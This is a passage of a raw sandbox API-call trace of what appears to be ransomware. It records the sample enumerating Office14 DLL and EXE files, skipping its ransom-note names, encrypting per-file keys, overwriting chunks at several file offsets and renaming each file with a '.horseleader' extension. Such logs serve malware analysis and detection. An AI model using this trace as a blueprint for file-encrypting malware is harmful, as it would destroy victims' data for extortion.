cFileName="FLTLDR.EXE", cAlternateFileName="")) returned 1 [0244.069] lstrcmpiW (lpString1="FLTLDR.EXE", lpString2="Windows") returned -1 [0244.069] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 70 [0244.069] StrStrIW (lpFirst="FLTLDR.EXE", lpSrch=".horseleader") returned 0x0 [0244.069] lstrcmpW (lpString1="FLTLDR.EXE", lpString2="#Decrypt#.txt") returned 1 [0244.069] lstrcmpW (lpString1="FLTLDR.EXE", lpString2="_uninstalling_.png") returned 1 [0244.069] lstrlenW (lpString=".testttjffg") returned 11 [0244.069] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE", lpSrch=".testttjffg") returned 0x0 [0244.069] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.069] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.070] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.072] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 70 [0244.072] StrStrW (lpFirst="FLTLDR.EXE", lpSrch=".txt") returned 0x0 [0244.072] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=157024) returned 1 [0244.072] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.072] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.075] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.076] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.076] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x10ab0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.077] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.077] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x21560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.077] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.079] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.079] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.079] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.079] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.079] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.079] CloseHandle (hObject=0x158) returned 1 [0244.080] GetProcessHeap () returned 0x780000 [0244.080] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.080] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE.horseleader") returned 82 [0244.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe.horseleader")) returned 1 [0244.081] GetProcessHeap () returned 0x780000 [0244.081] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.081] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7bf3f00, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x53907610, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf7bf3f00, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x417360, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IACOM2.DLL", cAlternateFileName="")) returned 1 [0244.081] lstrcmpiW (lpString1="IACOM2.DLL", lpString2="Windows") returned -1 [0244.081] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 70 [0244.081] StrStrIW (lpFirst="IACOM2.DLL", lpSrch=".horseleader") returned 0x0 [0244.081] lstrcmpW (lpString1="IACOM2.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.081] lstrcmpW (lpString1="IACOM2.DLL", lpString2="_uninstalling_.png") returned 1 [0244.081] lstrlenW (lpString=".testttjffg") returned 11 [0244.082] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL", lpSrch=".testttjffg") returned 0x0 [0244.082] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.082] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.082] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.083] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 70 [0244.083] StrStrW (lpFirst="IACOM2.DLL", lpSrch=".txt") returned 0x0 [0244.083] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4289376) returned 1 [0244.083] 
SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.084] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.090] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.091] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.091] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2091b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.091] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.095] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.096] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x412360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.096] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.099] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.099] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.099] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.100] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.100] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.100] CloseHandle (hObject=0x158) returned 1 [0244.100] GetProcessHeap () returned 0x780000 [0244.100] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.100] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.horseleader") returned 82 [0244.101] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll.horseleader")) returned 1 [0244.102] GetProcessHeap () returned 0x780000 [0244.102] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.102] FindNextFileW (in: hFindFile=0x7c6860, 
lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x31d88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="LICLUA.EXE", cAlternateFileName="")) returned 1 [0244.102] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="Windows") returned -1 [0244.102] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 70 [0244.102] StrStrIW (lpFirst="LICLUA.EXE", lpSrch=".horseleader") returned 0x0 [0244.102] lstrcmpW (lpString1="LICLUA.EXE", lpString2="#Decrypt#.txt") returned 1 [0244.102] lstrcmpW (lpString1="LICLUA.EXE", lpString2="_uninstalling_.png") returned 1 [0244.102] lstrlenW (lpString=".testttjffg") returned 11 [0244.103] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE", lpSrch=".testttjffg") returned 0x0 [0244.103] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.103] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.103] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.104] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 
70 [0244.104] StrStrW (lpFirst="LICLUA.EXE", lpSrch=".txt") returned 0x0 [0244.104] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=204168) returned 1 [0244.104] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.104] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.107] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.107] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.108] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x166c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.108] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.109] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.109] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.109] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2cd88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.109] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.110] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.110] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.111] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.111] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.111] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.111] CloseHandle (hObject=0x158) returned 1 [0244.111] GetProcessHeap () returned 0x780000 [0244.111] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.111] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE.horseleader") returned 82 [0244.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe.horseleader")) returned 1 [0244.113] 
GetProcessHeap () returned 0x780000 [0244.113] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.113] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc821f600, ftCreationTime.dwHighDateTime=0x1cbdfb3, ftLastAccessTime.dwLowDateTime=0xd776b9a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc821f600, ftLastWriteTime.dwHighDateTime=0x1cbdfb3, nFileSizeHigh=0x0, nFileSizeLow=0x183d780, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSO.DLL", cAlternateFileName="")) returned 1 [0244.113] lstrcmpiW (lpString1="MSO.DLL", lpString2="Windows") returned -1 [0244.113] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 67 [0244.113] StrStrIW (lpFirst="MSO.DLL", lpSrch=".horseleader") returned 0x0 [0244.113] lstrcmpW (lpString1="MSO.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.113] lstrcmpW (lpString1="MSO.DLL", lpString2="_uninstalling_.png") returned 1 [0244.113] lstrlenW (lpString=".testttjffg") returned 11 [0244.113] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL", lpSrch=".testttjffg") returned 0x0 [0244.113] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.113] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.113] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.114] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 67 [0244.114] StrStrW (lpFirst="MSO.DLL", lpSrch=".txt") returned 0x0 [0244.114] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=25417600) returned 1 [0244.114] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.114] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.118] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.118] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.120] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc1c3c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.120] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.122] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.122] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.122] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0x1838780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.122] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.125] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.125] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.126] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.126] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.126] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.126] CloseHandle (hObject=0x158) returned 1 [0244.126] GetProcessHeap () returned 0x780000 [0244.127] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.127] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.horseleader") returned 79 [0244.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll.horseleader")) returned 1 [0244.128] GetProcessHeap () returned 0x780000 [0244.128] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.128] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee94c400, ftCreationTime.dwHighDateTime=0x1cb7007, ftLastAccessTime.dwLowDateTime=0xd6225500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xee94c400, ftLastWriteTime.dwHighDateTime=0x1cb7007, nFileSizeHigh=0x0, nFileSizeLow=0x73b60, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOICONS.EXE", 